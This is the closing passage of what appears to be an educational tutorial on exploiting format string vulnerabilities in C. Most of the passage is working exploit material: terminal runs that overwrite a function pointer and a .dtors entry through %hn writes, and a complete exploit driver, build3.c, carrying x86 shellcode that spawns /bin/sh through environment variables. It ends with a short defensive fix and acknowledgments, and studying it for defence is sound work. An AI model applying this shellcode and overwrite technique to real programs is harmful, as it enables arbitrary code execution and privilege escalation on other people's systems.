Why didn't this work ? We said we had to build the exact copy of the memory between the 2 calls ... and we didn't do it ! argv[0] (the name of the program) changed. Our program is first named build2 (6 bytes) and vuln after (4 bytes). There is a difference of 2 bytes, which is exactly the value that you can notice in the example above. The address of the shellcode during the second call of build2 is given by sc=0xbffff88f but the content of argv[2] in vuln gives 20xbffff891: our 2 bytes. To solve this, it is enough to rename our build2 to only 4 letters e.g bui2:

>>cp build2 bui2
>>./bui2 0xbffff634 3
Calling ./bui2 ...
adr : -1073744332 (bffff634)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff891
adr : -1073744332 (bffff634)
val : -1073743727 (bffff891)
valh: 49151 (bfff)
vall: 63633 (f891)
[6öÿ¿4öÿ¿%.49143x%3$hn%.14482x%4$hn] (34)
0 0xbffff867
1 0xbffff86e
2 0xbffff891
3 0xbffff8bf
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [6öÿ¿4öÿ¿0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000
000000000000000] (127)
after : ptrf() = 0xbffff891 (0xbffff634)
bash$ 

Won again : that works much better that way ;-) The eggshell is in the stack and we changed the address pointed to by ptrf to have it point to our shellcode. Of course, it can happen only if the stack is executable.

But we have seen that format strings allow us to write anywhere : let's add a destructor to our program in the section .dtors:

>>objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
80498c0 ffffffff 00000000                    ........        
>>./bui2 80498c4 3
Calling ./bui2 ...
adr : 134518980 (80498c4)
val : -1073744156 (bffff6e4)
valh: 49151 (bfff)
vall: 63204 (f6e4)
[ÆÄ%.49143x%3$hn%.14053x%4$hn] (34)
Calling ./vuln ...
sc = 0xbffff894
adr : 134518980 (80498c4)
val : -1073743724 (bffff894)
valh: 49151 (bfff)
vall: 63636 (f894)
[ÆÄ%.49143x%3$hn%.14485x%4$hn] (34)
0 0xbffff86a
1 0xbffff871
2 0xbffff894
3 0xbffff8c2
4 0xbffff8ca
helloWorld() = 0x80486c4
accessForbidden() = 0x80486e8

before : ptrf() = 0x80486c4 (0xbffff634)
buffer = [ÆÄ000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x80486c4 (0xbffff634)
Welcome in "helloWorld"
bash$ exit
exit
>>

Here, no coredump is created while quitting our destructor. This is because our shellcode contains an exit(0) call.

In conclusion as a last gift, here is build3.c that also gives a shell, but passed through an environment variable:

/* build3.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Même fonction que dans build.c
}

int main(int argc, char **argv) {
  char **env;
  char **arg;
  unsigned char *buf;
  unsigned char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  if (argc == 3) {

    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
        &shellcode,
        atoi(argv[2]));              /* offset */
    
    fprintf(stderr, "%d\n", strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    env = (char **) malloc(sizeof(char *) * 4);
    env[0]=&shellcode;
    env[1]=argv[1];
    env[2]=argv[2];
    env[3]=NULL;
    execve(argv[0],arg,env);
  } else 
  if(argc==2) {

    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", environ[0]);
    buf = build(strtoul(environ[1], NULL, 16),  /* adresse */
        environ[0],
        atoi(environ[2]));              /* offset */
    
    fprintf(stderr, "%d\n", strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    execve("./vuln",arg,environ);
  }
    
  return 0;
}

Once again, since this environment is in the stack, we need to take care not to modify the memory (i.e. changing the position of the variables and arguments). The binary's name must contain the same number of characters as the name of vulnerable program vuln.

Here, we choose to use the global variable extern char **environ to set the values we need:

  1. environ[0]: contains shellcode;
  2. environ[1]: contains the address where we expect to write;
  3. environ[2]: contains the offset.
We leave you , play with it ... this (too) long article is already filled with too much source code and test programs.

Conclusion : how to avoid format bugs ?

As shown in this article, the main trouble with this bug comes from the freedom left to a user to build his own format string. The solution to avoid such a flaw is very simple: never leave a user providing his own format string! Most of the time, this simply means to insert a string "%s" when function such as printf(), syslog(), ..., are called. If you really can't avoid it, then you have to check the input given by the user very carefully.

Acknowledgments

The authors thank Pascal Kalou Bouchareine for his patience (he had to find why our exploit with the shellcode in the stack did not work ... whereas this same stack was not executable), his ideas (and more particularly the exec*() trick), his encouragements ... but also for his article on format bugs which caused, in addition to our interest in the question, intense cerebral agitation ;-)

Links


Footnotes

... commands1
the word command means here everything that effects the format of the string: the width, the precision, ...
... bytes2
the -1 comes from the last character reserved for the '\0'.